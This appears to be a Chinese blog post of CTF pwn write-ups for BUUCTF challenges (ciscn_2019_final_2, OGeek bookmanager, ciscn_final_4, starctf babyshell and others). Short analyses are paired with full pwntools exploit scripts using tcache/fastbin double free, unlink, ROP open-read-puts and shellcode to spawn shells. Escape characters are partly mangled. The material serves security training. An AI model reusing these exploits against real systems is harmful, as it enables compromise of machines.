此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码!
-2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648
护网杯_2018_gettingstart
此时又要用到我们的数学知识!
转换浮点数工具
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './2018_gettingStart'
r = remote('node4.buuoj.cn',29971)
elf = ELF(binary)
payload = b'a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A)
sleep(0.3)
r.sendline(payload)
r.interactive()
ciscn_2019_final_2
分析主要函数!
Allocate申请函数!
Free释放函数!
Show打印函数!
Exit退出函数!
本题设计IO,故进行细致分析,大致思路为采用UAF漏洞,打印出libc等低地址,进而计算出偏差,重写低地址,修改fd指向stdin+0x70位置,设置为666,进行输入 *** 作!
Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)
Allocate()
Free(2)
heap_low_addr = Show(2)
此时通过连续Free(2)达成tcache的double free,需注意Free之间需要Allocate申请一次,设置bool为1即可释放!
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
for i in range(7):
[Tab] Free(1)#tcache填充
[Tab] Allocate(2)
Free(1)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols[‘IO_2_1_stdin’]-libc.symbols[’__malloc_hook’]))
此时填充tcache[0x90],并泄露出libc上低4位字节,可以计算出_IO_2_1_stdin_与__malloc_hook的偏移量!
Allocate(1,str(stdin_low+0x70))#对已存在的libc的低地址进行覆写
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)#泄露出heap上低4位字节
此时重复泄露出heap上的低4位字节,为接下来的修改fd指针作准备!
Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
此时重新对tcache的fb指针进行布局!重写_fileno(_fileno 返回文件描述符)
由上一系列的流程进而可以得到flag
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './ciscn_final_2'
r = remote('node4.buuoj.cn',25631)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
def Allocate(choice=1,payload='1n'):
r.sendlineafter("which command?n> ",'1')
r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice))
r.sendafter("your inode number:",payload)
def Free(choice=1):
r.sendlineafter("which command?n> ",'2')
r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice))
def Show(choice=1):
r.sendlineafter("which command?n> ",'3')
r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice))
r.recvuntil("number :")
if choice==1:
return int(r.recvuntil('n')[:-1],10)&0xffffffff
else:
return int(r.recvuntil('n')[:-1],10)&0xffff
def Exit():
r.sendlineafter("which command?n> ",'4')
Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)
Allocate()
Free(2)
heap_low_addr = Show(2)
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
for i in range(7):
Free(1)#tcache
Allocate(2)
Free(1)
#gdb.attach(r)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols['_IO_2_1_stdin_']-libc.symbols['__malloc_hook']))
Allocate(1,str(stdin_low+0x70))
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)
Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
success(hex(new_heap_addr))
success(hex(main_arena_low))
success(hex(stdin_low))
#gdb.attach(r)
Exit()
r.interactive()
[OGeek2019]bookmanager
函数过程较为复杂,其实较为多,不仔细分析了,使用Unlink手法进行攻击__free_hook,经过多次尝试发现__malloc_hook或__realloc_hook无法获取权限,故对__free_hook进行覆写。
本题难度主要是对函数进行分析.攻击手法难度较低!
位于Edit函数存在堆溢出漏洞!
from unittest.main import main
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './pwn'
#r = process(binary)
r = remote('node4.buuoj.cn',27418)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
def start():
r.sendlineafter("create: ",'njh')
def Allocate(chapterName='abn'):
r.sendlineafter("Your choice:",'1')
r.sendlineafter("Chapter name:",chapterName)
def AllocateSect(chapterName,sectionName):
r.sendlineafter("Your choice:",'2')
r.sendlineafter("add into:",str(chapterName))
r.recvuntil("0x")
addr = int(r.recvline()[:-1],16)
r.sendlineafter("Section name:",str(sectionName))
return addr
def AllocateText(sectionName,size=0x18,payload='n'):
r.sendlineafter("Your choice:",'3')
r.sendlineafter("add into:",str(sectionName))
r.sendlineafter("write:",str(size))
r.sendlineafter("Text:",payload)
def Free(chapterName):
r.sendlineafter("Your choice:",'4')
r.sendlineafter("Chapter name:",str(chapterName))
def FreeSect(sectionName):
r.sendlineafter("Your choice:",'5')
r.sendlineafter("Section name:",str(sectionName))
def FreeText(sectionName):
r.sendlineafter("Your choice:",'6')
r.sendlineafter("Section name:",str(sectionName))
def Book():
r.sendlineafter("Your choice:",'7')
def Edit(choice,new,sectionName=''):
r.sendlineafter("Your choice:",'8')
if choice == 1:
r.sendlineafter("(Chapter/Section/Text):",'Chapter')
r.sendlineafter("Chapter name:",new)
elif choice == 2:
r.sendlineafter("(Chapter/Section/Text):",'Section')
r.sendlineafter("New Section name:",new)
else:
r.sendlineafter("(Chapter/Section/Text):",'Text')
r.sendlineafter("Section name:",str(sectionName))
r.sendlineafter("New Text:",new)
sectionaddr = []
start()
Allocate('/bin/sh')
target = AllocateSect('/bin/sh','1')+0x20
AllocateSect('/bin/sh','2')
AllocateSect('/bin/sh','3')
fd = target-0x18
bk = target-0x10
AllocateText('1',0x88)
AllocateText('2',0x88)
AllocateText('3')
AllocateText('3')
AllocateText('3',0x18,b'/bin/shx00')
Edit(3,p64(0)+p64(0x81)+p64(fd)+p64(bk)+12*p64(0)+p64(0x80)+p64(0x90),'1')
FreeText('2')
AllocateText('2',0x70,b'a'*8)
Book()
r.recvuntil(b'aaaaaaaa')
main_arena = u64(r.recv(6).ljust(8,b'x00'))-344
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']
one = [0x45206,0x4525a,0xef9f4,0xf0897]
Edit(3,b'a'*0x18+p64(libc_base+libc.symbols['__free_hook']),'1')
Edit(3,p64(libc_base+libc.symbols['system']),'1')
success(hex(target))
success(hex(main_arena))
#gdb.attach(r)
Free('/bin/sh')
r.interactive()
ciscn_2019_final_4
House of Spirit
该ELF存在反调试,故我们利用ida进行patch!
经过分析主要函数!发现仅仅存在UAF漏洞,不存在其它漏洞,没有Edit编辑函数。
发现采用覆写__malloc_hook的方法失效,故此时我们采用覆写到栈地址上,覆写rip!
本题脚本较大(臃肿),但分步来分析的话相对比较简单!
start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil(’x7f’)[-6:].ljust(8,b’x00’))-88
libc_base = main_arena-0x10-libc.symbols[’__malloc_hook’]
malloc_hook = libc_base+libc.symbols[’__malloc_hook’]
realloc = libc_base+libc.symbols[’__libc_realloc’]
environ_addr = libc_base+libc.symbols[‘environ’]
首先我们通过unsorted bin特性泄露出libc基地址
Allocate(0x88)#2 leak libc
Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b’x7f’)[-6:].ljust(8,b’x00’))-0x210
read_addr = libc_base+libc.symbols[‘read’]
此时我们利用double free漏洞得到bss段上的全局变量的chunk,从而修改全局变量来泄露environ内容得到栈地址!
此时能够泄露出栈地址!
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b’n’
Allocate(0x78,payload)#14
此时再次利用double free能够申请得到栈上地址,并写入ROP,此时我们覆写malloc_hook为add rsp;ret即可抬升rsp,并且执行ROP,此时我们能往里面进行写入0x1000大小内容,完成orw!
Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b’a’*0x13+p64(libc_base+add_rsp48))
r.sendlineafter(">> ",‘1’)
r.sendlineafter(“size?”,‘10’)
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols[‘openat’]+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols[‘puts’]+libc_base)+b’/flagx00x00x00’
sleep(0.1)
r.send(payload)
此时我们利用该流程,便可以得到flag!
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
binary = './ciscn_final_4'
r = remote('node4.buuoj.cn',28544)
#r = process(binary)
elf = ELF(binary)
libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libc = ELF('./libc-2.23.so')
pop_rsi_ret = 0x0202e8#0x0202e8
pop_rdi_ret = 0x021102#0x021102
pop_rdx_ret = 0x001b92#0x001b92
add_rsp48 = 0x00c9f81#0x00c9551
note_addr = 0x06020C0
def start():
r.sendlineafter("what is your name? ",p64(0x81)+b'njh')
def Allocate(size=0x18,payload='n'):
r.sendlineafter(">> ",'1')
r.sendlineafter("size?",str(size))
r.sendafter("content?",payload)
def Free(index):
r.sendlineafter(">> ",'2')
r.sendlineafter("index ?",str(index))
def Show(index):
r.sendlineafter(">> ",'3')
r.sendlineafter("index ?",str(index))
start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil('x7f')[-6:].ljust(8,b'x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
malloc_hook = libc_base+libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']
environ_addr = libc_base+libc.symbols['environ']
Allocate(0x88)#2 leak libc
Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))-0x210
read_addr = libc_base+libc.symbols['read']
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b'n'
Allocate(0x78,payload)#14
Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b'a'*0x13+p64(libc_base+add_rsp48))
success(hex(note_addr))
success(hex(main_arena))
success(hex(environ_addr))
success(hex(stack_addr))
#gdb.attach(r,'b *0x0000000000400B2C')
r.sendlineafter(">> ",'1')
r.sendlineafter("size?",'10')
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols['openat']+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols['puts']+libc_base)+b'/flagx00x00x00'
sleep(0.1)
r.send(payload)
r.interactive()
starctf_2019_babyshell
逻辑比较简单!
check函数检测shellcode是否匹配data段上的一串数据,如下
此时我们只要输入的shellcode从其中选择即可!
此时我们选择调整rdi与rdx的值,并且调用syscall进行sys_read,并输入sh执行函数!
或者我们可以利用x00跳出循环比较,从而执行sh函数!如’x00J’+’x00’ 或 ‘x00B3’
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './starctf_2019_babyshell'
r = remote('node4.buuoj.cn',27400)
#r = process(binary)
elf = ELF(binary)
#gdb.attach(r,'b *0x004008C6')
r.recvuntil("give me shellcode, plz:")
payload = asm('pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdi;syscall')
r.send(payload)
sleep(0.1)
r.send(b'a'*0xc+asm(shellcraft.sh()))
r.interactive()
wustctf2020_easyfast
简单的double
简单的UAF堆题目!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './wustctf2020_easyfast'
r = remote('node4.buuoj.cn',26675)
#r = process(binary)
elf = ELF(binary)
libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
shell_addr = 0x0602090
def Allocate(size=0x18):
r.sendlineafter("choice>n",'1')
r.sendlineafter("size>n",str(size))
def Free(index):
r.sendlineafter("choice>n",'2')
r.sendlineafter("index>n",str(index))
def Edit(index,payload='n'):
r.sendlineafter("choice>n",'3')
r.sendlineafter("index>n",str(index))
r.send(payload)
def Shell():
r.sendlineafter("choice>n",'4')
Allocate(0x48)#0
Allocate(0x48)#1
Free(0)
Edit(0,p64(shell_addr-0x10))
Allocate(0x48)#2
Allocate(0x48)#3
Edit(3,p64(0))
success(hex(shell_addr))
#gdb.attach(r)
Shell()
r.interactive()
wustctf2020_name_your_dog
存在局限的任意地址写漏洞,较为简单!
经过计算可以修改scanf@got为后门函数地址!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './wustctf2020_name_your_dog'
r = remote('node4.buuoj.cn',27072)
#r = process(binary)
elf = ELF(binary)
shell_addr = 0x080485CB
dogs = 0x0804A060
def nameWhich(offset,payload):
r.sendlineafter("Name for which?n>",str(offset))
r.sendlineafter("Give your name plz: ",payload)
nameWhich('-7',p64(shell_addr))
r.interactive()
ciscn_2019_en_3
该文件出现了FORTIFY保护!
本题较为简单,2.27的double free,本意想要采用house of sprite!但是经过实践该方法复杂且无法绕过canary。故还是老老实实采用double free最简单的方式来获取权限!
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
binary = './ciscn_2019_en_3'
r = remote('node4.buuoj.cn',26765)
#r = process(binary)
elf = ELF(binary)
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='n'):
r.sendlineafter("Input your choice:",'1')
r.sendlineafter("story: ",str(size))
r.sendafter("story: ",payload)
def Free(index):
r.sendlineafter("Input your choice:",'4')
r.sendlineafter("Please input the index:",str(index))
#gdb.attach(r)
r.sendlineafter("What's your name?",'%p%p%p%p.%p,%p%p%p%p%p%p%p.%p,')
r.recvuntil(".0x")
libc_base = int(r.recv(12),16)-libc.symbols['_IO_file_jumps']
r.recvuntil(".0x")
stack_addr = int(r.recv(12),16)-0x138
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
success("stack_addr -> "+hex(stack_addr))
success("libc_base -> "+hex(libc_base))
r.sendafter("Please input your ID.",p64(0x71))
Allocate()#0
Allocate(0x18,b'/bin/shx00')#1
Free(0)
Free(0)
Allocate(0x18,p64(free_hook))
Allocate()#2
Allocate(0x18,p64(system))
success(hex(free_hook))
#gdb.attach(r)
Free(1)
r.interactive()
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)